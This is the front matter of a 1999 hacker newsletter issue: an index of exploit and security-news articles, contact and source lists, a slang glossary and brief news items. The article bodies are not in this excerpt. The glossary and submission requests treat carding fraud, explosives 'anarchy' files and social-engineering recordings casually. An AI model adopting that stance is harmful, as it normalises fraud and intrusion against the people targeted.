Copy Link
Add to Bookmark
Report
hwa-hn19
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth.
http://www.csoft.net/~hwa
http://www.digitalgeeks.com/hwa
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99=] Number 19 Volume 1 1999 May 22nd 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"If hackers ran the world, there'd be no war--lots of accidents, maybe."
-Anon.
Synopsis
---------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #19
=-----------------------------------------------------------------------=
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*** ***
*** please join to discuss or impart news on techno/phac scene ***
*** stuff or just to hang out ... someone is usually around 24/7***
*** ***
*** Note that the channel isn't there to entertain you its for ***
*** you to talk to us and impart news, if you're looking for fun***
*** then do NOT join our channel try #weirdwigs or something... ***
*** we're not #chatzone or #hack ***
*** ***
*******************************************************************
=-------------------------------------------------------------------------=
Issue #19
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. NMRC Advisory, DoS with Netware 4.x's TTS........................
04.0 .. CA's InoculateIT for Windows NT v4.53 only scans inboxes.........
04.1 .. CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4
05.0 .. [ISN] Everywhere your MAC address shows up.......................
06.0 .. [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs..............
07.0 .. INNdstart 2.0 vulnerability, possible root compromise............
08.0 .. Sunsolve Database leaks crucial information......................
09.0 .. [ISN] Asia is wide open to virus, hacker attacks.................
10.0 .. More on Zyklon's legal troubles..................................
11.0 .. IRC war and a Police HQ bomb threat send two headed for trouble..
12.0 .. UK Labels Windows as 'secure'....................................
13.0 .. Yugoslavia to stay plugged in....................................
14.0 .. VISA Releases Draft Protection Profile ..........................
15.0 .. cgichk v1.35 by su1d sh3ll now scans for 65 vulnerabilities......
15.1 .. cgichk.pl PERL version of the above cgi scanner from Wiltered Fire
16.0 .. Vulnerability in Netscape bookmarks found by George Guninski.....
17.0 .. Lotus Notes in bed with the NSA on encryption keys...............
18.0 .. Packetstom Security Gets the choke order for .yu sites...........
19.0 .. Common Trojans and the ports they can be found on................
20.0 .. Fts_read vulnerabilty provides root compromise in FreeBSD find, du
21.0 .. Excel Macro Virus protection patch has a hole....................
22.0 .. Possible root compromise when installing new SSHD................
23.0 .. Apple's AtEase 5.0 security hole.................................
24.0 .. Bug in Microsoft Outlook Express.................................
25.0 .. Trivial buffer overflow DoS on WinAMP 2.x........................
26.0 .. DISA Limits network activity.....................................
27.0 .. Money in the bank is an intangible?..............................
28.0 .. r00tfest is May 21st to 23rd, and promises to be a big success...
29.0 .. heh.pl creates a number of rootshells in /tmp and disguises itself
30.0 .. RedHat6.0 fixes available for some current vulnerabilities........
31.0 .. BisonWare FTP server vulnerabilities can lead to root compromise..
32.0 .. Key Escrow revisited (who are the real criminals here??)..........
33.0 .. AOL Under Siege by Hackers, NOT! .................................
34.0 .. Unknown spammer gets sued.........................................
35.0 .. German police crack down on internet crime........................
36.0 .. After a rather long hiatus BoW resurfaces and releases issue #9...
37.0 .. AntiOnline opens up its knowledge database to the pheds...........
38.0 .. [ISN] RAID99 Hosted by CERIAS Call for papers.....................
39.0 .. Cryptogram May 15th'99............................................
40.0 .. [ISN] Why i'm a security pessimist................................
41.0 .. Bombs Off The Net!................................................
42.0 .. Dark Spyre may end up in jail.....................................
43.0 .. ACTINIC ecommerce package claims to be 'unhackable'...............
44.0 .. MP3's off the net?................................................
45.0 .. Free DNS! finally a network picks up the pieces from ml.org ......
46.0 .. pIRCHCrack cracks password in pirch.ini files.....................
47.0 .. NASA vulnerable to attack.........................................
48.0 .. Vermont's Security Compromised ...................................
49.0 .. NIST May Be Named Info Security Clearing House ...................
50.0 .. 097M.Tristate Macro Virus Contained ..............................
51.0 .. "Hackers" Ruin Online Poll .......................................
52.0 .. DSC v1.01 Released new ezine hits the electronic stands...........
53.0 .. Laser Pointers Illegal? ..........................................
54.0 .. Exploiting NT buffer overruns.....................................
55.0 .. More on biometrics from ZDNET.....................................
=--------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: Aug19th-22nd Niagara Falls... .................
HA.HA .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas72@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. <a href="http://www.antionline.com/">http://www.antionline.com/</a>
Back Orifice/cDc..................<a href="http://www.cultdeadcow.com/">http://www.cultdeadcow.com/</a>
News site (HNN) .....,............<a href="http://www.hackernews.com/">http://www.hackernews.com/</a>
Help Net Security.................<a href="http://net-security.org/">http://net-security.org/</a>
News,Advisories,++ ...............<a href="http://www.l0pht.com/">http://www.l0pht.com/</a>
NewsTrolls .......................<a href="http://www.newstrolls.com/">http://www.newstrolls.com/</a>
News + Exploit archive ...........<a href="http://www.rootshell.com/beta/news.html">http://www.rootshell.com/beta/news.html</a>
CuD Computer Underground Digest...<a href="http://www.soci.niu.edu/~cudigest">http://www.soci.niu.edu/~cudigest</a>
News site+........................<a href="http://www.zdnet.com/">http://www.zdnet.com/</a>
News site+Security................<a href="http://www.gammaforce.org/">http://www.gammaforce.org/</a>
News site+Security................<a href="http://www.projectgamma.com/">http://www.projectgamma.com/</a>
News site+Security................<a href="http://securityhole.8m.com/">http://securityhole.8m.com/</a>
News site+Security related site...<a href="http://www.403-security.org/">http://www.403-security.org/</a>
News/Humour site+ ................<a href="http://www.innerpulse.com/>http://www.innerpulse.com</a>
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
<a href="http://www.cnn.com/SEARCH/">Link</a>
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
<a href="http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0">Link</a>
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
<a href="http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack">Link</a>
http://www.ottawacitizen.com/business/
<a href="http://www.ottawacitizen.com/business/">Link</a>
http://search.yahoo.com.sg/search/news_sg?p=hack
<a href="http://search.yahoo.com.sg/search/news_sg?p=hack">Link</a>
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
<a href="http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack">Link</a>
http://www.zdnet.com/zdtv/cybercrime/
<a href="http://www.zdnet.com/zdtv/cybercrime/">Link</a>
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
<a href="http://www.zdnet.com/zdtv/cybercrime/chaostheory/">Link</a>
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
<a href="http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm">Link</a>
http://freespeech.org/eua/ Electronic Underground Affiliation
<a href="http://freespeech.org/eua/">Link</a>
http://ech0.cjb.net ech0 Security
<a href="http://ech0.cjb.net">Link</a>
http://axon.jccc.net/hir/ Hackers Information Report
<a href="http://axon.jccc.net/hir/">Link</a>
http://net-security.org Net Security
<a href="http://net-security.org">Link</a>
http://www.403-security.org Daily news and security related site
<a href="http://www.403-security.org">Link</a>
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
<a href="http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html">Link</a>
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq
reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of
those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
Crypto-Gram
~~~~~~~~~~~
CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.
To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are available
on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an inventor
of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of
the International Association for Cryptologic Research, EPIC, and VTW. He
is a frequent writer and lecturer on cryptography.
CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This info directly from their latest ish:
Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09
ISSN 1004-042X
Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
Archivist: Brendan Kehoe
Poof Reader: Etaion Shrdlu, Jr.
Shadow-Archivists: Dan Carosone / Paul Southworth
Ralph Sims / Jyrki Kuoppala
Ian Dickinson
Cu Digest Homepage: http://www.soci.niu.edu/~cudigest
[ISN] Security list
~~~~~~~~~~~~~~~~~~~
This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
00.3 THIS IS WHO WE ARE
~~~~~~~~~~~~~~~~~~
Some HWA members and Legacy staff
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
cruciphux@dok.org.........: currently active/editorial
darkshadez@ThePentagon.com: currently active/man in black
fprophet@dok.org..........: currently active/IRC+ man in black
sas72@usa.net ............. currently active/IRC+ distribution
vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
dicentra...(email withheld): IRC+ grrl in black
Foreign Correspondants/affiliate members
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
N0Portz ..........................: Australia
Qubik ............................: United Kingdom
system error .....................: Indonesia
Wile (wile coyote) ...............: Japan/the East
Ruffneck ........................: Netherlands/Holland
And unofficially yet contributing too much to ignore ;)
Spikeman .........................: World media
Please send in your sites for inclusion here if you haven't already
also if you want your emails listed send me a note ... - Ed
http://www.genocide2600.com/~spikeman/ .. Spikeman's DoS and protection site
http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian)
*******************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' ***
*******************************************************************
:-p
1. We do NOT work for the government in any shape or form.Unless you count paying
taxes ... in which case we work for the gov't in a BIG WAY. :-/
2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news
events its a good idea to check out issue #1 at least and possibly also the
Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ...
@HWA
00.4 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Well what does HWA stand for? never mind if you ever find out I may
have to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out hax0r is "new skewl" and although
it is laughed at, shunned, or even pidgeon holed with those 'dumb
leet (l33t?) dewds' <see article in issue #4> this is the state
of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you
up and comers, i'd highly recommend you get that book. Its almost
like buying a clue. Anyway..on with the show .. - Editorial staff
@HWA
00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Also released in issue #3. (revised) check that issue for the faq
it won't be reprinted unless changed in a big way with the exception
of the following excerpt from the FAQ, included to assist first time
readers:
Some of the stuff related to personal useage and use in this zine are
listed below: Some are very useful, others attempt to deny the any possible
attempts at eschewing obfuscation by obsucuring their actual definitions.
@HWA - see EoA ;-)
!= - Mathematical notation "is not equal to" or "does not equal"
ASC(247) "wavey equals" sign means "almost equal" to. If written
an =/= (equals sign with a slash thru it) also means !=, =< is Equal
to or less than and => is equal to or greater than (etc, this aint
fucking grade school, cripes, don't believe I just typed all that..)
AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21)
AOL - A great deal of people that got ripped off for net access by a huge
clueless isp with sekurity that you can drive buses through, we're
not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the
least they could try leasing one??
*CC - 1 - Credit Card (as in phraud)
2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's
CCC - Chaos Computer Club (Germany)
*CON - Conference, a place hackers crackers and hax0rs among others go to swap
ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk
watch videos and seminars, get drunk, listen to speakers, and last but
not least, get drunk.
*CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker
speak he's the guy that breaks into systems and is often (but by no
means always) a "script kiddie" see pheer
2 . An edible biscuit usually crappy tasting without a nice dip, I like
jalapeno pepper dip or chives sour cream and onion, yum - Ed
Ebonics - speaking like a rastafarian or hip dude of colour <sic> also wigger
Vanilla Ice is a wigger, The Beastie Boys and rappers speak using
ebonics, speaking in a dark tongue ... being ereet, see pheer
EoC - End of Commentary
EoA - End of Article or more commonly @HWA
EoF - End of file
EoD - End of diatribe (AOL'ers: look it up)
FUD - Coined by Unknown and made famous by HNN <g> - "Fear uncertainty and doubt",
usually in general media articles not high brow articles such as ours or other
HNN affiliates ;)
du0d - a small furry animal that scurries over keyboards causing people to type
weird crap on irc, hence when someone says something stupid or off topic
'du0d wtf are you talkin about' may be used.
*HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R
*HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to
define, I think it is best defined as pop culture's view on The Hacker ala
movies such as well erhm "Hackers" and The Net etc... usually used by "real"
hackers or crackers in a derogatory or slang humorous way, like 'hax0r me
some coffee?' or can you hax0r some bread on the way to the table please?'
2 - A tool for cutting sheet metal.
HHN - Maybe a bit confusing with HNN but we did spring to life around the same
time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper
noun means the hackernews site proper. k? k. ;&
HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html
J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d
MFI/MOI- Missing on/from IRC
NFC - Depends on context: No Further Comment or No Fucking Comment
NFR - Network Flight Recorder (Do a websearch) see 0wn3d
NFW - No fuckin'way
*0WN3D - You are cracked and owned by an elite entity see pheer
*OFCS - Oh for christ's sakes
PHACV - And variations of same <coff>
Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare
Alternates: H - hacking, hacktivist
C - Cracking <software>
C - Cracking <systems hacking>
V - Virus
W - Warfare <cyberwarfare usually as in Jihad>
A - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
P - Phreaking, "telephone hacking" PHone fREAKs ...
CT - Cyber Terrorism
*PHEER - This is what you do when an ereet or elite person is in your presence
see 0wn3d
*RTFM - Read the fucking manual - not always applicable since some manuals are
pure shit but if the answer you seek is indeed in the manual then you
should have RTFM you dumb ass.
TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0
TBA - To Be Arranged/To Be Announced also 2ba
TFS - Tough fucking shit.
*w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions
from the underground masses. also "w00ten" <sic>
2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)
*wtf - what the fuck
*ZEN - The state you reach when you *think* you know everything (but really don't)
usually shortly after reaching the ZEN like state something will break that
you just 'fixed' or tweaked.
@HWA
-=- :. .: -=-
01.0 Greets!?!?! yeah greets! w0w huh. - Ed
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Thanks to all in the community for their support and interest but i'd
like to see more reader input, help me out here, whats good, what sucks
etc, not that I guarantee i'll take any notice mind you, but send in
your thoughts anyway.
* all the people who sent in cool emails and support
FProphet Pyra TwstdPair _NeM_
D----Y Kevin Mitnick (watch yer back) Dicentra
vexxation sAs72 Spikeman Astral
p0lix Vexx g0at security
Shouts to tekz from HK for asking nicely in eye-are-see! ;-)
and to t4ck for making my night albeit I couldn't stick around for
the rest of the comedy routine. hacked star dot star with phf huh?
.... ;-))
and the #innerpulse, crew and some inhabitants of #leetchans ....
although I use the term 'leet loosely these days, <k0ff><snicker> ;)
kewl sites:
+ http://www.l0pht.com/
+ http://www.2600.com/
+ http://www.freekevin.com/
+ http://www.genocide2600.com/
+ http://www.genocide2600.com/~spikeman/
+ http://www.genocide2600.com/~tattooman/
+ http://www.hackernews.com/ (Went online same time we started issue 1!)
+ http://www.net-security.org/
+ http://www.slashdot.org/
+ http://www.freshmeat.net/
+ http://www.403-security.org/
+ http://ech0.cjb.net/
@HWA
01.1 Last minute stuff, rumours and newsbytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"What is popular isn't always right, and what is right isn't
always popular..."
- FProphet '99
+++ When was the last time you backed up your important data?
++ FREE KEVIN Demonstrations Go WorldWide
From HNN http://www.hackernews.com/
contributed by Macki
With demonstrations now scheduled in front of the US Embassy in Russia the FREE KEVIN movement goes
World Wide. Kevin Mitnick has been held in pretrial detention since February 15, 1995, without a
constitutionally guaranteed bail hearing for possession of software allegedly worth millions of
dollars. Protest demonstrations are now being planned around the world for Friday, June 4 in front
of federal courthouses and U.S. embassies beginning at 2 pm to protest the unjust treatment of Kevin
Mitnick. If there is a protest in your city please attend. If there is not please organize one.
The government must be shown that the people will not sit idly by while their rights are trampled!
FREE KEVIN Demonstrations
http://www.2600.com/demo/index.html
++ OpenBSD 2.5
From HNN http://www.hackernews.com/
contributed by Weld Pond
OpenBSD, a Free UNIX variant that places emphasis on portability, standardization, correctness, security, and
cryptography, has just been upgraded to version 2.5. OpenBSD is a multiplatform and ultrasecure operating
system. HNN uses it, shouldn't you? "OpenBSD: Sending the Kiddies to /dev/null since 1992"
openbsd.org
http://www.openbsd.org/
Amazon.com- Reserve Your Copy Today!
http://www.amazon.com/exec/obidos/ASIN/0968363733/hackernewsnet
++ Chinese attacks on U.S computers
From http://www.net-security.org/
CHINESE HACKERS RAID U.S. COMPUTERS
by LucasAr, Monday 17th May 1999 on 4:30 pm CET
Chinese hackers have attacked U.S. government information systems, including the
White House network, in response to the errant bombingof the Chinese Embassy in
Yugoslavia, according to an FBI report.
++ Just found this on the net, on Discovery Online no less, it
has a (short) Hacker's Hall of Fame list with mini-bios of the
featured hackers. - Ed
http://www.discovery.com/area/technology/hackers/stallman.html
++ MIT Pulls R2-D2 Hack
From HNN http://www.hackernews.com/
contributed by Code Kid
Arguably the place where the word Hacker was coined,MIT students have turned the Great Dome into a giant
R2-D2. For those of you who have been dead for the last seven years R2-D2 is a android from the Star Wars
movie series. The hack consisted of covering the dome in red, white, blue, and black mesh-fabric panels.
The hackers left a dozen doughnuts and instructions on how to remove the display. The Great Dome has been
a popular place for Hacks in the past. Some of the better known ones have transformed the Dome into a
Breast, a Pumpkin, or have placed a Police Crusier replica on the
top.
MIT Hack Gallery - Pictures Here
http://hacks.mit.edu/Hacks/Gallery.html
Wired
http://www.wired.com/news/news/culture/story/19743.html
++ Scanner profiteer busted
From HNN http://www.hackernews.com/
Scanner Profiteer
contributed by erewhon
Eric Ford, 27, of Studio City, CA, has pleaded guilty of recording and then selling the contents of a
cellular phone call he listened to with a modified police scanner.The conversation was "marital squabble"
that took place between Tom Cruise and Nicole Kidman. After parts of the conversation appeared in tabloids
the couple contacted the FBI to start an investigation. The perpetrator was sentenced by a federal judge to
six months in jail, 150 hours of community service and fined $3,000.
APB Online
http://www.apbonline.com/911/1999/05/17/cruise0517_01.html
++ Internet Set Free in Canada
From HNN http://www.hackernews.com/
contributed by blsonne
The Canadian Radio-television and Telecommunications Commission (CRTC) agreed on Monday that it will not
regulate new media services on the Internet. After concluding that new media services are vibrant, highly
competitive and successful without regulation, the CRTC has decided not to impose new rules on the internet
so as to not hinder Canada in the global marketplace.
CRTC
http://www.crtc.gc.ca/ENG/NEWS/RELEASES/1999/R990517e.htm
++ Fujitsu Victim of Password Stealing Virus
From HNN http://www.hackernews.com/
contributed by 0yK0t
InfoWeb, Fujitsu Ltd.'s Internet service, has become the victim of an email virus designed to steal users
passwords. The email claims that users are at risk from a new virus and should run the enclosed attachment
as a precaution. The attachment then steals users passwords and emails them to a separate address.
G-Search Ltd., a Fujitsu affiliate, says that at least 68 people received the virus/attachment. And once
again this virus only effects Windows users.
AsiaBizTech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/70448
Mucho thanks to Spikeman for directing his efforts to our cause of bringing
you the news we want to read about in a timely manner ... - Ed
@HWA
01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
No mail for sharing this week!
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
* Issue #19 'w00t'
*
*
*
*
*
*
*
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
